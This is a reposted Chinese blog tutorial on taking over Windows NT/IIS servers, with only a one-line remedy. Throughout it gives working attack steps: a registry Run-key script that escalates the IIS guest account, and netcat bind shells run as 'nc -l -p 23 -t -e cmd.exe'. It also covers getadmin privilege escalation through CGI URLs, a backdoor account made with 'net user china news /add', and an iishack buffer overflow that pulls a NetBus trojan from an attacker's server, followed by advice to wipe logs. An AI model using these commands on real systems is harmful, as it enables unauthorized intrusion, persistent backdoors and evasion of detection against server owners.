一、通過修改注冊表 凡是具有登錄NT本機的用戶，例如IUSR_machine，都具有對 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run 項的可讀可寫權限，該用戶可以遠程訪問這個項。比如，他可以創建一個bat文件，文件內容為：cmd.exe /c net localgroup administrators IUSR_machine /add，把該文件copy到winnt目錄下，然后在注冊表上述的項添加一個數值，指向這個文件。 那么，當下次Admin登錄到該機器上時，就會自動把IUSR_machine添加到Administrators組。 另，注冊表鍵HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Common Startup 也可以這么做。 二、自建Telnet服務在NT上執行指令 要求用戶有文件上傳權限，而且該目錄位于web目錄下，該目錄允許執行，下面是具體步驟。 假設你的目錄是[url]www.xxx.com/frankie[/url]，那么，把cmd.exe(位于C:\winnt\system32\cmd.exe)和Netcat里面包含的nc.exe傳到這個目錄上去。 然后，在瀏覽器端輸入： [url]http://www.xxx.com/frankie/cmd.e[/url] ... 20-t%20-e%20cmd.exe 這時候，你的瀏覽器將停止不動，實際上，Server上的Telnet的服務已經產生了。 這時，用Telnet連接[url]www.xxx.com[/url]的23端口。你發現，不用密碼，不用登陸，對方C:\提示符已經出現在你的眼前！更妙的是，這個Telnet server是一個一次性的服務，當客戶端一退出，該服務也將終止。 Netcat不同于一般的特洛伊***，它可以構建任何的TCP連接服務。在瀏覽器端輸入上述的字符串，等價于在NT的Dos方式下輸入 nc -l -p 23 -t -e cmd.exe
這將把cmd.exe綁定到23端口上。 三、***NTserver典型途徑V2.0 1、如果你有NT/IIS服務器的任何一個帳號，哪怕是guest帳號，都可以獲得root。 2、用Netcat和iishack可以獲得root。 3、Iusr_計算機名這個帳號有ftp上傳，web執行等權限。 4、在Web server上執行程序是***NT的關鍵。 5、要在Web server上執行程序就先要上傳文件到cgi-bin目錄或者scripts目錄等有執行權限的目錄上去。 在本文中，目標機器的名稱是ntsvr2，目標機器的域名是[url]www.xxx.com[/url]，目標機器上有scripts和cgi-bin目錄，scripts目錄下有uploadn.asp等asp程序，可能有guest帳號，肯定有iusr_ntsvr2這個帳號。 第一個方法、用Iusr_ntsvr2后者Guest這兩個帳號 這里假設我們已經破解了這個帳號的密碼，在瀏覽器輸入： [url]http://www.xxx.com/scripts/uploadn.asp[/url]
guest和iusr_ntsvr2這兩個帳號都可以進這個asp頁面，在這里把文件getadmin和gasys.dll以及cmd.exe上傳到/scripts目錄。 然后輸入： [url]http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2[/url]
大約十多秒后屏幕顯示： CGI Error
這時有90%的可能是：你已經把IUSR_ntsvr2升級為Administrator，也就是任何訪問該web站的人都是管理員。 下面可以Add user： [url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
這樣就創建了一個叫china用戶，密碼是news，然后： [url]http://www.xxx.com/scripts/getadmin.exe?china[/url] 第二個方法、用匿名Ftp 如果允許匿名帳號ftp登陸的設定，也給我們帶來了突破NT server的機會。我們用ftp登陸一個NT server，比如:[url]www.xxx.com[/url](示例名)： ftp [url]www.xxx.com[/url] Connected to [url]www.xxx.com[/url] 220 ntsvr2 Microsoft FTP Service (Version 3.0). Ntsvr2這個東西暴露了其NETbios名，那么在IIS的背景下，必然會有一個IUSR_ntsvr2的用戶帳號，屬于Domain user組，這個帳號我們以后要用來獲取Administrator的權限。 User ([url]www.xxx.com:[/url](none)):anonymous 331 Anonymous access allowed， send identity (e-mail name) as password. Password：輸入 guest@ 或者guest。 對于缺乏網絡安全知識的管理員來說，很多人沒有將guest帳號禁止，或者沒有設置密碼。那么guest帳號就是一個可用的正確的用戶帳號，雖然只屬于Domain guest組。在這種情況下我們就可以進NT server的ftp了。 進去以后，看看目錄列表，試試 cd /scripts 或cgi-bin等關鍵目錄，如果運氣好，改變目錄成功，這時你就有了80%的把握。 把Winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll傳上去到cgi-bin，然后輸入： [url]http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2[/url]
大約十多秒后屏幕顯示： CGI Error 這時有90%的可能是：你已經把IUSR_ntsvr2升級為Administrator，也就是任何訪問該web站的人都是管理員。 下面可以add user： [url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
這樣就創建了一個叫china用戶，密碼是news，然后： [url]http://www.xxx.com/cgi-bin/getadmin.exe?china[/url]
或者 [url]http://www.xxx.com/scripts/tools/getadmin.exe?china[/url] 你再用China的帳號登陸，就可以有最大的權限了，也可以用上面的cmd.exe的方法直接修改 如果沒有cmd.exe，也可以自己傳一個上去到scripts/tools或者cgi-bin目錄。 第三個方法、用netcat和iishack 如果你熟悉使用Netcat這個工具，你就知道，netcat可以利用NT的弱點在其上綁定端口，下面用eEye的工具已經介紹過，如果你熟悉Netcat，成功的可能性會更大。 IIS的ISAPI的毛病(*.HTR) 我們再來看看eEye最近這兩天發現的一個關于NT/IIS的問題和工具。在IIS的/Inetsrv目錄下，有個DLL文件叫ism.dll，這個模塊在web運行的時候就被加載到較高的內存地址，并且導致了零字節問題到處出現IIShack.asm，利用這個毛病，eEye寫了兩個程序： iishack.exe ncx99.exe 為達目的你必須自己有一個web server，把ncx99.exe和netbus***傳到這個web server的目錄下，比如你的web server是： [url]www.mysvr.com?[/url] 而對方的IIS server是[url]www.xxx.com[/url]
則： iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/ncx99.exe??[/url] (注意，不要加http://字符!)
上述命令輸入后這時你應該可以看到 ------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- [email]barns@eeye.com[/email]. [url]http://www.eEye.com[/url] [usage: iishack ] eg - iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/thetrojan.exe[/url] do not include 'http://' before hosts! --------------------------------------------------------------- Data sent! 然后，再把Netbus等特洛伊***傳到對方機器上去： iishack [url]www.example.com[/url] 80 [url]www.myserver.com/netbus.exe[/url]
ncx99.exe實際上是有名的Netcat的變種，它把對方server的cmd.exe綁定到Telnet服務。 ncx.exe 這是較早的版本，是把端口綁到80的，由于80端口跑web服務，端口已經被使用。所以可能不一定有效。然后，用Telnet到對方的99或80端口： Telnet [url]www.xxx.com[/url] 99 結果是這樣： Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.]
這樣，你就完全控制了其硬盤上的文件！注意，如果你type exit退出，對方server上的這個進程也會退出。 補救方法：在IIS的www service屬性中將主目錄的應用程序設置的*.htr的映射刪除。 其它：用Retina.exe得到NT域內的帳號清單，逐個嘗試這些帳號，如果有的密碼薄弱而被你猜出來，就可以用上面的方法來獲取NT的Admin。 職場 windows 休閑 系統

0

分享

微博 QQ 微信

收藏

上一篇：教你如何進入有密碼的Window... 下一篇：保護系統 用SVS為Window... xiong2127

772篇文章，232W+人氣，1粉絲

關注

Ctrl+Enter?發布

發布

取消

推薦專欄更多

全局視角看大型園區網

路由交換+安全+無線+優化+運維

共40章?|?51CTO夏杰

￥51.00 1697人訂閱

訂???閱 網工2.0晉級攻略 ——零基礎入門Python/Ansible

網絡工程師2.0進階指南

共30章?|?姜汁啤酒

￥51.00 1570人訂閱

訂???閱 基于Python的DevOps實戰

自動化運維開發新概念

共20章?|?撫琴煮酒

￥51.00 431人訂閱

訂???閱 負載均衡高手煉成記

高并發架構之路

共15章?|?sery

￥51.00 507人訂閱

訂???閱 帶你玩轉高可用

前百度高級工程師的架構高可用實戰

共15章?|?曹林華

￥51.00 462人訂閱

訂???閱

猜你喜歡

2007中國互聯網哈哈榜之年度人物 2007中國互聯網哈哈榜之七大關鍵詞 Java線程：線程的調度-休眠 我們不得不面對的中年職場危機 職場終極密籍--記我的職業生涯 用光影魔術手制作一寸照片（8張一寸） 我的IT職場生涯: 畢業4年，月薪過萬 Linux關閉休眠和屏保模式 年薪從0到10萬-我的IT職場經驗總結 Windows7刪除休眠文件hiberfil.sys節省大量C盤空間 致IT同仁 — IT人士常犯的17個職場錯誤 “跳槽加薪”現象，無奈的職場規則 Windows 10 "升"與"不升"之我見 Windows server 2016 搭建RDS服務 kubernetes 存儲卷與數據持久化 Windows 設置 VMware workstation 虛擬機開機啟動 漫談 Windows Server 管理工具 如何在Windows中批量創建VMware的虛擬機 解決asp.net負載均衡時Session共享的問題 中小企業2018-2020年信息化環境運維及安全建議

掃一掃,領取大禮包

0

分享 關注 xiong2127

轉載于:https://blog.51cto.com/xiong/15491

總結

以上是生活随笔為你收集整理的教你获取WindowsNT的Admin权限的方法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。